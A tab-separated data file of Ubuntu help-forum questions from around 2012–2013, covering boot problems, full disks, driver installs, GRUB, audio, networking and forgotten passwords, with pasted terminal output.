257311	issue with first time login/getting to boot menu	recently , i reinstalled ubuntu as it was just , not happy . i noticed that ubuntu had updated from 12.04 to 13.something , i ca n't recall . once booting , i immediately noticed a change . in 12 , it automatically gave me an account with my name , where i put in my password . in 13 , however , it gives me a login , where i put in my username , then my password . that 's fine , i can do that . except , there seems to be a problem . from what i can tell , ubuntu seems to have forgotten to make a default administrator account . at least , that 's my understanding of the situation . i logged in with guest session and went to accounts , and it seemed that the only account there was , was the guest session . after some searching , i came across various fixes . i had planned to go into recovery and use the following commands : useradd username -m -s /bin/bash passwd username adduser username sudo or at least ls /home to check if there really was an admin account . the issue is , holding left shift to go to the boot menu . when i select ubuntu from the bootloader , i have tried numerous times with different timings to hold `` shift '' , but the issue is , instead of bringing up this lovely little screen : http : //i.stack.imgur.com/76owe.png i get a bare , black screen , with a underscore flashing at the top left corner . it does that for several moments and then the os crashes , and i have to press the on button again . if i can get to the boot menu , i think i 'm golden . i could n't find anything else on this , so excuse me if i missed out . all best , thanks in advance .
257314	`` the volume filesystem root has only ... ''	i am having this problem in ubuntu 12.04 , but i fin strange that when i go to /tmp it wont allow me to delete some files , with message `` operation not permitted '' or `` this file could not be handled because you dont have permissions to read it '' . it is only a pc and i have the root password . i was trying to get at least 2000 mb of free space on the root file system to upgrade to 12.10 and see if that resolved the problem . currently free space on root file system is 190 mb . this is my output : root @ jcsalazar-vostro-3550 : ~ # df filesystem 1k-blocks used available use % mounted on /dev/sda6 7688360 7112824 184984 98 % / udev 2009288 4 2009284 1 % /dev tmpfs 806636 1024 805612 1 % /run none 5120 0 5120 0 % /run/lock none 2016584 5316 2011268 1 % /run/shm /dev/sda5 472036 255920 191745 58 % /boot /dev/sda7 30758848 7085480 22110900 25 % /home root @ jcsalazar-vostro-3550 : ~ # sudo parted -l model : ata toshiba mk3261gs ( scsi ) disk /dev/sda : 320gb sector size ( logical/physical ) : 512b/512b partition table : msdos number start end size type file system flags 1 1049kb 106mb 105mb primary fat16 2 106mb 15.8gb 15.7gb primary ntfs boot 3 15.8gb 278gb 262gb primary ntfs 4 278gb 320gb 41.9gb extended 5 278gb 279gb 499mb logical ext4 6 279gb 287gb 7999mb logical ext4 7 287gb 319gb 32.0gb logical ext4 8 319gb 320gb 1443mb logical linux-swap ( v1 ) i apprecciate any new ideas that can help me . thnx carlos
257315	12.10 my unity doesnt start after restart	i have installed 12.10 x64 on my laptop today . after installation it started normally , after restart for updates it started normally , but after next restart ( and every else ) it strat only empty screen with no taskbar or icons and in low resolution . my unity plugin in ccsm is enabled . do you have any idea how to fix it ? or anybody else in similar trouble ?
257316	icons missing after upgrading xubuntu	i did the following in my computer : $ sudo apt-get update $ sudo apt-get upgrade after restarting the computer , i see the visuals of my desktop changed . also , there is not even single folder icon in any drive . only the name of folder is being displayed and there is no icon . in the panel , certain utilities have lost thier icons too . in a window , the folder icons are not available . also in the left , the thumbnails of desktop , filesystem , documents , music , etc . are not displayed . in the right ( panel ) , several utilities have the same default icon ( such as the terminal emulator , trash , web browser , mail reader , settings manager ) . the thing is only the icons are not visible , but i can double-click and open the folders . how can i get back those icons ( like the default yellow color folder icon ) because it is annoying to see only the names of folder displayed without any icon i did only the upgrade thing i mentioned above , nothing else . ( i did not tweak anything . ) when i login as guest the windows are normal as it used to be before normal screen before upgrade :
257320	assessment is `` failing '' under id 5 , reallocated sector count , whose value comes out to be 561 sectors	i repeatedly receive a message from disk utility on screen , which says `` a hard disk is reporting health problems . '' on clicking the examine button , i am taken towards a window , which says disk failure is imminent on viewing smart data and running self tests i was taken to new window which shows `` 564 bad sectors on top right hand corner , and also says that `` back up all data and replace the disk '' i tried to various commands to run disk repairing wizard , but unfortunately every time , a pop up window with warning regarding bad health of drive appears and nothing happens . system is core i3 with 2gb ram and 320gb hard disk with following description , on writing sudo fdisk -lu it prints disk /dev/sda : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000e4a21 device boot start end blocks id system /dev/sda1 * 2048 104859647 52428800 7 hpfs/ntfs/exfat /dev/sda2 104859648 314574847 104857600 7 hpfs/ntfs/exfat /dev/sda3 314574848 551428095 118426624 7 hpfs/ntfs/exfat /dev/sda4 551430142 625141759 36855809 5 extended /dev/sda5 551430144 621228031 34898944 83 linux /dev/sda6 621230080 625141759 1955840 82 linux swap / solaris on writing , root @ ubuntu : ~ # sudo fsck -y /dev/sda5 i got : fsck from util-linux 2.19.1 e2fsck 1.41.14 ( 22-dec-2010 ) /dev/sda5 : clean , 137141/2182992 files , 708304/8724736 blocks on writing , root @ ubuntu : ~ # sudo fsck -pcfv /dev/sda5 i got : fsck from util-linux 2.19.1 /dev/sda5 : updating bad block inode . 137141 inodes used ( 6.28 % ) 18 non-contiguous files ( 0.0 % ) 106 non-contiguous directories ( 0.1 % ) # of inodes with ind/dind/tind blocks : 0/0/0 extent depth histogram : 109527/3 708304 blocks used ( 8.12 % ) 0 bad blocks 1 large file 84575 regular files 13613 directories 57 character device files 25 block device files 0 fifos 0 links 38862 symbolic links ( 27519 fast symbolic links ) 0 sockets 137132 files thank you .
257322	how to uninstall ubuntu 12.10 to install ubuntu 12.04 with only ubuntu 12.10 with usb pen drive ( startup disk creator does n't finish the creation )	due to my ignorance and the need to use a programm i ca n't install on ubuntu 12.10 , i decided to uninstall it to install ubuntu 12.04 ( 64 bit , because i have a 64 bit laptop ) . i have only ubuntu 12.10 as os and no idea of the procedure ( i ca n't find it in this forum or on the site , there are only instructions useful if you have also windows or other softwar running with ubuntu , which i have not . ) i ca n't even download ubuntu 12.04 on my usb pen drive , because it stops at some point . it says that usb-creator-gtk crashes with sigsegv at the executable path /usr/bins/usb-creator-gtk . any idea ? thanks in advance for you help !
257323	i cant download steam in ubuntu	when i download steam , there 's an error : o it says this error could be caused by required additional software packages which are missing or not installable . furthermore there could be a conflict between software packages which are not allowed to be installed at the same time . how : c
257339	installing ubuntu with full disk encryption including encrpyted boot on i-usb pendrive ii-a regular hdd	hi how to install ubuntu 12.04+ with full disk encryption including encrypted boot partition : a- to a usb drive ie . 16gb or 32gb b- to a hdd
257340	fatal : module ndiswrapper not found	i tried all fixes on how to fix `` ndiswrapper not found '' ? on answer 3 fix suggestion # 2 : when sudo make i get can not find kernel build files in /usr/src/linux-headers-3.7.0-7-generic please give the path to kernel build directory with the kbuild= < path > argument to make i also have tried uninstalling all ndiswrapper files and re installing . i 'm fairly new to ubuntu . i 'm trying to get my netgear wn311t working . sudo modprobe ndiswrapper gives me warning : all config files need .conf : /etc/modprobe.d/blacklist , it will be ignored in a future release . fatal : module ndiswrapper not found .
257342	ubuntu changes grub boot-order . how to prevent this ?	i am triple booting windows vista , ubuntu 12.04 desktop and a fluxbox based on ubuntu 12.10 mini-iso . vista was installed first , then i installed ubuntu 12.04 desktop and then ubuntu 12.10 fluxbox . the ubuntu 12.10 fluxbox installation booted as default , which was my intention . all the systems get updated regularly . sometimes after a dist-update in the ubuntu system which is n't booting as default the default boot changes to that system . so sometimes the grub boot-order changes from ubuntu 12.10 fluxbox as default to ubuntu 12.04 desktop as default , a number of dist-updates later it changes back again . this behavior happens repeatedly , what causes the behaviour only sometimes is not clear . it seems like there are two grub.cfg files ( resposible for generating the grub startup menu as i understand it ) , one generated by ubuntu 12.04 desktop and one by ubuntu 12.10 fluxbox . during boot one of those files gets read . which one is used changes sometimes after the updates . the updates are not release-updates ( e.g . 12.04 - > 12.10 ) . is there any way to prevent this behaviour ?
257343	openvpn client starts but ifconfig tun output reports device not found	i am new user of ubuntu and i am trying to experiment on vpn connections . i have ubuntu 10.04 on my machine . i installed vmware player and on top of that another ubuntu 10.04 . so , on the vmware player now i installed the openvpn server which seems to work fine since the output of /etc/init.d/openvpn restart , gives me ok , and the output of ifconfig tun gives me details . on the same machine now ( not on the vmware ) i installed the client . the /etc/openvpn/client.conf has the following configuration . client dev tun proto udp remote 10.8.0.0 1194 resolv-retry infinite nobind user nobody group nogroup persist-key persist-tun ca ca.crt cert client.crt key client.key ns-cert-type server tls-auth ta.key 1 comp-lzo verb 3 here the client again seems to work fine since i am getting ok . but the output of ifconfig tun gives me that the device did not found . any help ?
257344	thinkpad w500 ubuntu 12.10 64 poor battery performace	this week i installed ubuntu 12.10 64 on my thinkpad w500 . great machine , powerful . but my battery lasts only around 2 hours . what i 've done : in the bios , i disabled the discrete graphic card ( intel 4500mhd ) . switched off bluetooth . are there other drivers or settings to use ?
257346	intel mobile 4 series drivers with `` nomodeset '' -parameter	i just installed ubuntu 12.04 on my laptop . since i could n't start the installer and only got a `` black screen '' i had to start it with the `` nomodeset '' -parameter . the installation went fine , after rebooting the system i still had the `` black screen '' -issue so i still have to boot the system with `` nomodeset '' . now i 'm trying to get the right video card drivers installed . the questions are : how do i find out my exact chip in the first place ? ( since `` intel mobile 4 series '' does n't help me a lot here ) how do i install the correct drivers afterwards ?
257348	change account photo from webcam after installation	i took my profile photo during installation of ubuntu 12.10 . now i 'm trying to change it , but i see only choices to select an image from files . how to re-acquire the image with the attached webcam ?
257349	how do i extend my ubuntu partition ?	i installed ubuntu 12.10 in a 90gb partition of when i `` shrinked '' from the c drive of which has windows 7 . i have a 500gb hdd . i want to give ubuntu an extra 100gb . how do i do this please ?
257361	installation of software password	i want to install eclipse on my ubuntu . i entered the same password as i did for login but it rejects it . the login password is the only one i have entered . what do i do to install eclipse .
257362	ubuntu 12.10 , wifi is not working hp dv6-7084la	hi i 've tried many things to download or activate wi-fi driver ! but it seems tobe without driver , can anyone help me to find it ! anothe probles is sound driver it works but not at all , i mean , beats audio integrated on laptop i 've typed in terminal : lspci 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gt 650m ] ( rev a1 ) 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 0a:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 ) 00:00.0 host bridge : intel corporation 3rd gen core processor dram controller ( rev 09 ) 00:01.0 pci bridge : intel corporation xeon e3-1200 v2/3rd gen core processor pci express root port ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 3rd gen core processor graphics controller ( rev 09 ) 00:14.0 usb controller : intel corporation 7 series/c210 series chipset family usb xhci host controller ( rev 04 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1c.3 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 4 ( rev c4 ) 00:1c.5 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 6 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation hm77 express chipset lpc controller ( rev 04 ) 00:1f.2 raid bus controller : intel corporation 82801 mobile sata controller [ raid mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 01:00.0 vga compatible controller : nvidia corporation gk107 [ geforce gt 650m ] ( rev a1 ) 08:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5229 pci express card reader ( rev 01 ) 0a:00.0 network controller : intel corporation centrino wireless-n 2230 ( rev c4 ) 0b:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8111/8168b pci express gigabit ethernet controller ( rev 07 )
257363	how can i change a forgotten password ?	we 've forgotten our password and can not download and install software . we have followed the instructions in the help file using grub but when asked for a new unix password we become stuck as when we enter an 8 letter password it comes back with an error message and password unchanged - any suggestions much appreciated . btw the instructions on the help page are missing a line after entering passwd username , you should then enter passwd to get enter new unix password . we have tried the remount suggested in blogs mount o rw , remount but to no avail ...
257377	how would i mount a remote server so it persists after a reboot ?	on ubuntu server 12.04 i can run the following command to mount a remote directory : sshfs root @ 192.168.1.1 : /w/common/rotas/nurses /home/danny/nurserotas/ i am then prompted for the password for the remote server ( 192.168.1.1 ) . how could i run the above command , including the password entry , whenever the server boots ?
257379	broken audio after installing realtek hd drivers	i had some problem with stock audio on the realtek alc888s making it a bit too quiet . so , after reading https : //help.ubuntu.com/community/hdaintelsoundhowto , i downloaded the hd audio drivers for kernel 3 and installed them during the end of the install , sound halted . i then rebooted my system . and then , sound does not play anymore . oss-test gives me that /dev/mixer : no such file or directory . sound settings shows only one dummy output like this : also , amith @ amith-dualcore : ~ $ ls -l /dev/snd/ total 0 crw-rw -- -t 1 root audio 116 , 1 feb 17 21:50 seq crw-rw -- -t 1 root audio 116 , 33 feb 17 21:50 timer
257383	controller for pwmconfig	are there 3-pin fan controllers , that work with pwmconfig , which are connected to e.g . usb or serial port ? i would like to control the speed of 3-pin fans . my mainboard sensors/controllers are not supported by pwmconfig .
257386	can not install team fortress 2 , home folder too small ?	i have very little experience with ubuntu . i 'm trying to install team fortress 2 but it keeps telling me that i do n't have enough space . i have a 500gb hdd , and at least half of it is free . how do i allocate more space to the home folder so i can install tf2 ? and like i said , i have very little experience with ubuntu , i 'd appreciate step-by-step instructions . screenshot of the problem :
257393	ubuntu , windows and dos in a laptop	i have purchased a lenovo thinkpad laptop with dos os in it . i want to install windows 7 and ubuntu in it . i purchased windows 7 and installed to 1 drvie ( 100gb ) and i have 1gb dos partition . i added 2 more partition while windows installation ( one for data and other for ubuntu ) . while ubuntu installation it did not detect windows 7 . it detects dos only . after ubuntu installation in boot menu there is no windows 7 ... . so i inserted windows cd -- > recovery option -- > cmd terminal -- > bootrec /fixmbr bootrec /fixboot bootrec /rbuildbcd i tried this now i am able to boot windows ... now ubuntu is missing thanks in advance ! !
257396	good partition strategy if i want to change distros frequently ?	i want to dual-boot windows 8 ( already installed ) and ubuntu 12.10 . the thing is i would like to try out different distros over the coming months . so my question is what would be a good partition strategy to make it easy to migrate from one distro to another . i know the first step would be to create a separate /home partition ( in addition to the root and swap partition ) . what about other stuff ? i might also have apache installed so would i need to either migrate /etc/www manually between distros or create a partition for /etc ?
257401	how do i install chromium and skype ?	having just switched to ubuntu from mint i tried to install the chromium browser and skype . they gave the following errors : chromium some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : chromium-browser : depends : libnss3-1d ( > = 3.12.3 ) but it is not going to be installed skype : as soon as i open it with software center it appears can not install libasound2 : i386 any ideas on how to fix either of these ?
257402	how do i install broadcom proprietary drivers without direct internet access	using ubuntu 12.04 on dell laptop , after trying on 12.10 + other flavors7u , etc. ) . broadcom drivers still not working . ethernet connection also nonfunctional , but that 's a hardware issue and not the os 's fault . other forum posts on similar situations are not useful because they require a wired internet connection . it is a dell inspiron e1501 . i installed ubuntu 12.10 via the windows installer . then installed 12.04 instead , because i heard it was better at handling additional drivers , after i installed 12.04 , the addition drivers immediately showed me that my 'broadcom sta wireless driver ' was not activated . i clicked 'activate ' and then nothing happened . apparently it needs to download the driver , which it ca n't do , without internet . i thought i would just download the drivers on another machine and then try to install them manually . i went to broadcom 's site and found a linux driver which i downloaded and transferred to the ubuntu laptop desktop via sd card . and then i ran 'make ' command through the terminal . here 's some highlights : root @ ubuntu : /home/username/desktop/wld # make kbuild_nopedantic=1 make -c /lib/modules/`uname -r`/build m=`pwd` make [ 1 ] : entering directory `/usr/src/linux-headers-3.5.0-23-generic' wireless extension is the only possible api for this kernel version using wireless extension api using wireless extension api cc [ m ] /home/username/desktop/wld/src/wl/sys/wl_linux.o /home/username/desktop/wld/src/wl/sys/wl_linux.c:43:24 : fatal error : asm/system : no such file or directory compilation terminated . make [ 2 ] : *** [ /home/username/desktop/wld/src/wl/sys/wl_linux.o ] error 1 make [ 1 ] : *** [ _module_/home/username/desktop/wld ] error 2 make [ 1 ] : leaving directory `/usr/src/linux-headers-3.5.0-23-generic' make : *** [ all ] error 2
257403	how can i get pdf viewer to display text ?	when i open a pdf file , it does n't display text . graphics show up . how do i get the pdf viewer to display text ?
257410	ca n't record using gnome shell	when i hit ctrl+alt+shift+r in gnome shell , i get no visual feedback , no file is saved if i do it twice on ~/videos/ or ~/ . i get this error on ~/.xsession-errors : window manager warning : log level 16 : shellrecorder : failed to parse pipeline : no element `` vp8enc ''
257413	i ca n't install update because i need more space	i recently installed ubuntu server 12.04 lts . after i tried to make the very first update in a couple of days , i encountered a problem which is not new , but i think in my case it is a bit distinguished . so , i tried to install a new kernel version . the system said there is an error , something with dependencies , so it said to try apt-get -f install instead . the output : xxx @ lab103-server : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : linux-image-3.2.0-37-generic suggested packages : fdutils linux-doc-3.2.0 linux-source-3.2.0 linux-tools the following new packages will be installed : linux-image-3.2.0-37-generic 0 upgraded , 1 newly installed , 0 to remove and 39 not upgraded . 2 not fully installed or removed . need to get 0 b/38.5 mb of archives . after this operation , 149 mb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 187430 files and directories currently installed . ) unpacking linux-image-3.2.0-37-generic ( from ... /linux-image-3.2.0-37-generic_3.2.0-37.58_amd64.deb ) ... done . dpkg : error processing /var/cache/apt/archives/linux-image-3.2.0-37-generic_3.2.0-37.58_amd64.deb ( -- unpack ) : failed in write on buffer copy for backend dpkg-deb during `./lib/modules/3.2.0-37-generic/kernel/drivers/usb/serial/ftdi_sio.ko ' : no space left on device no apport report written because the error message indicates a disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.2.0-37-generic /boot/vmlinuz-3.2.0-37-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.2.0-37-generic_3.2.0-37.58_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) as you can see , there 's not enough space somewhere . concerning space : xxx @ lab103-server : ~ $ df -ht filesystem type size used avail use % mounted on /dev/mapper/vg-root ext4 330m 240m 74m 77 % / udev devtmpfs 3.9g 8.0k 3.9g 1 % /dev tmpfs tmpfs 1.6g 764k 1.6g 1 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 3.9g 600k 3.9g 1 % /run/shm /dev/sda2 ext2 229m 26m 192m 12 % /boot /dev/mapper/vg-usr ext4 8.4g 6.5g 1.5g 82 % /usr /dev/mapper/vg-var ext4 2.8g 604m 2.1g 23 % /var /dev/mapper/vg-tmp ext4 378m 359m 0 100 % /tmp /dev/mapper/vg-home ext4 901g 25g 831g 3 % /home /dev/sda1 vfat 190m 124k 190m 1 % /boot/efi my system information : linux lab103-server 3.2.0-29-generic # 46-ubuntu smp fri jul 27 17:03:23 utc 2012 x86_64 x86_64 x86_64 gnu/linux other posts suggest to remove the old kernels to free some space before installing new ones , but in my case , i only have one kernel version ! lozovskiy @ lab103-server : ~ $ dpkg -l | grep linux-image ii linux-image-3.2.0-29-generic 3.2.0-29.46 linux kernel image for version 3.2.0 on 64 bit x86 smp iu linux-image-server 3.2.0.37.45 linux kernel image on server equipment . i am afraid to remove them , so i think another solution would be first increasing space of /boot ? or is it / ? which one and how to increase ?
257414	internet disconnects intermittently using realtek rtl8111	the broadband ethernet connection stops to work or rather stays connected but stops loading pages and showing content on the internet with a server not found error . the connection information states the internet is connected with a correct ip configuration but still the surfing problems occur quite frequently and suddenly starts working after few minutes . how can this be resolved ? on running : sudo lshw -c network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:07:00.0 logical name : eth0 version : 07 serial : d4 : be : d9:2a:16:09 size : 100mbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl8168e-3_0.0.4 03/27/12 ip=115.252.220.236 latency=0 link=yes multicast=yes port=mii speed=100mbit/s resources : irq:42 ioport:2000 ( size=256 ) memory : c1404000-c1404fff memory : c1400000-c1403fff *-network description : wireless interface product : centrino wireless-n 2230 vendor : intel corporation physical id : 0 bus info : pci @ 0000:08:00.0 logical name : wlan0 version : c4 serial : 68:5d:43:45:67:4e width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlwifi driverversion=3.8.0-6-generic firmware=18.168.6.1 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:47 memory : c1500000-c1501fff
257416	what are practical advantages of using linux-image-virtual kernel ?	ubuntu provides an alternative kernel package - linux-image-virtual , that is supposed to be optimized for use in virtual machines . what are actual optimizations and how much faster/smaller/better is it compared to the generic kernel when running on the guest os ? also , are these optimizations equally effective for all leading virtual machines , or does qemu/virtualbox/vmware/yourfavouritevm gain any special advantages in performance ?
257419	ubuntu 12.04 - nvidia geforce 210 driver install - `` error '' xserver running	i 've been trying to update my nvidia driver , but i keep getting errors . as im quite new to ubuntu . the following is the install log : using : nvidia-installer ncurses user interface - > the file '/tmp/.x0-lock ' exists and appears to contain the process id '1196 ' of a runnning x server . error : you appear to be running an x server ; please exit x before installing . for further details , please see the section installing the nvidia driver in the readme available on the linux driver download page at www.nvidia.com . error : installation has failed . please see the file '/var/log/nvidia-installer.log ' for details . you may find suggestions on fixing installation problems in the readme available on the linux driver download page at www.nvidia.com .
257421	list all human users	how can i list all human users that i 've created ? i 've tried cat /etc/passwd and it just lists a lot of stuff .
257422	infinite loop of logins in ubuntu 12.10	when i go to the home user and enter my password , i see a black screen , then flashes and it back to the login screen and asks me to reinsert my password in an infinite loop of logins . i entered in tty pressing ctrl+alt+f2 and login from there without problems . but when i try to enter with startx or xinit i get a server error ( 1 ) we try to reconfigure xinit , try and purge , remove , clean , re-install xinit but i still have the receipt problem . i can only enter in the guest session , in my personal session passes this problem i have ubuntu 12.10 and unity for default and my graphic card is a geforce 6200 ( not problem with card , windows not have problem )
257425	can i force grub2-update not to use uuid ?	i am experiencing install hell trying to add an installation of ubuntu 12.10 and scientific linux 6.3 to an old machine ( bios not efi ) with debian squeeze and linux mint 10 . the installs seem to go ok but when rebooting grub either refuses to boot completely ( i had to reinstall grub ) or complain that the uuid of both ubuntu and scientific linux are invalid . most of the time debian squeeze and linux mint 10 boot ok. one of the hard drives is a 3tb hard drive formatted using guid/gpt . it is the one that gets grub on it 's mbr . is it possible to force grub not to use uuids . this way even if it is corrupted i stand a chance of repairing the install manually or at least booting manually with some difficulty ?
257429	ca n't install ubuntu for several reasons	i 'm having some issues installing ubuntu on my samsung np-rv520-s02se laptop . first off , i 'm getting error : failure reading sector somethingsomething when booting the cd and hitting `` install ubuntu '' . i think it might be because of uefi , but here 's the second issue i 'm having . since a couple of ways back , i 've been unable to enter bios . so i ca n't check if uefi is enabled or disabled . when booting it says `` [ f2 ] enter bios '' and when i hit f2 that text changes to `` please wait.. '' so i 'm pretty sure it 's registering my command and that key f2 key is working , yet it 's just skipping the bios and bringing me to the windows boot manager , or the ubuntu cd if that 's in the cd drive . anyone who 'd know what might be wrong ? i should also mention that i 'm not the best at ubuntu , i 'm fairly new .
257430	problem with resized partition	i have ubuntu 12.10 . i resized my sda5 from about 71gb to 43gb using gparted , i did n't get any errors . after restarting my computer , sda5 is gone both from ubuntu and windows ( it was d : partition ) and i see some red exclamation mark : . following is the screenshot of information window for sda5 : is there any way i can repair my partition without deleting the data on it ?
257433	firefox video links - open as vlc network stream	if i click a link in firefox and select open with vlc , it downloads the entire file , before opening it in vlc media player and playing it . chrome is even worse and will keep the file in your downloads directory instead of /tmp if i do the same thing on my android tablet ( click the video link ) it will not download the entire file and then play it , but stream it in the player . i can copy and paste the link into vlc- > open network stream which has the desired effect , but how can i make firefox/chrome do this automatically ? i do n't want to keep filling my tiny 60gb ssd 's /tmp folder and having to reboot or manually remove the files .
257434	deactivate authentication ?	i have ubuntu 12.10 and i want to deactivate the authentication because for every action i have to type the os password and i do n't want to continue doing it anymore .
257438	graphical themes for grub	i am a fan of burg because it makes grub look pretty . however , it has n't been supported in ages and does n't work properly on uefi systems . has anyone out there made something similar recently ?
257439	headphone automatically muted in ubuntu 12.04	i 've a strange problem in my ubuntu . every time i plug a headphone my speaker volume automatically gets mute and its gain goes to 0 db as you can see in the figure below . i can not unmute the speaker via system settings because it only controls the master volume . yes , i can use alsamixer and unmute the speaker and i can use the following command to unmute it : amixer set -c 1 speaker 64 unmute it works , but , i have to type this everytime i plug a headphone . so , i 'm not happy with this solution . it 's likely ubuntu has a configuration file to define my sound card behaviour , but i do n't know where it is and how to configure it . someone could give me an orientation ?
257440	volume randomly fluctuates on certain applications	this is a pretty crazy - and annoying - problem . with some applications , usually games , my volume will start to fluctuate rapidly and randomly all on its own after about a dozen seconds spent running the program . this has happened on linux mint 14 cinnamon , ubuntu 12.10 , and ubuntu 13.04 , all fresh installs . and the weird thing is i ca n't find any connection between the applications . katawa shoujo , starsector , some wine games . flash stuff seems fine , in and out of the browser . i think music players like cinnamon , banshee and rhythmbox are okay ; i have n't seen any problems with those . there must be some shared library , or more likely audio driver problems , causing this problem . it does n't happen on windows 7 , so i do n't think it 's hardware . i 'm just at a total loss as to how i should fix this , or what the problem could be . lshw shows my audio device as `` 5 series/3400 series chipset high definition audio ''
257444	touch screen on asus x202e not working properly	got a little problem with using my touch screen on asus x202e with i3 ( the notebook-undervolted version ) . the thing is : when i touch the screen it perfectly recognizes where i touched it and places a cursor there . even if i click exactly in the same spot it does not interact ( `` click '' ) on objects . i also noticed that it works in some apps : i recently closed steam window by touching the screen . the question is : is it possible to make touch screen work everywhere ? and it would be great if it would `` auto-click '' where i touch instead of putting a cursor there and after next touch `` clicking '' ? thanks for your help ! : ) @ edit : well - it seems to have started working for some reason . maybe an update of some kind . it works great now ! : d
257446	dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem .	i got this error while installing ubuntu-restricted-extras : e : dpkg was interrupted , you must manually run 'sudo dpkg -- configure -a ' to correct the problem . so i ran that in terminal : vennesa @ vennesa-thinkpad-r61 : ~ $ sudo dpkg -- configure -a setting up update-notifier-common ( 0.126 ) ... flashplugin-installer : downloading http : //archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.2.202.270.orig.tar.gz since then i ca n't install any thing . what do i do ?
257454	use usb external hdd to install ubuntu	so i want to install ubuntu by booting it from my external usb drive , as is outlined here . the thing is , i read here that the drive will be erased . my external drive is a 500gb hdd with a lot of stuff on it , over 350gb of stuff , and i do n't have anywhere to back it all up on ( not to mention it would take a good while to do so , and then put it back again afterwards ) . i do however see that the second link uses a different method than the first , so does the first also require the disk to be formatted ? and if so , is there some way i can do this without formatting my entire drive ? my dvd drive is having issues so i ca n't install it from there , and a wubi install does n't want to work , so this is the last option i know of .
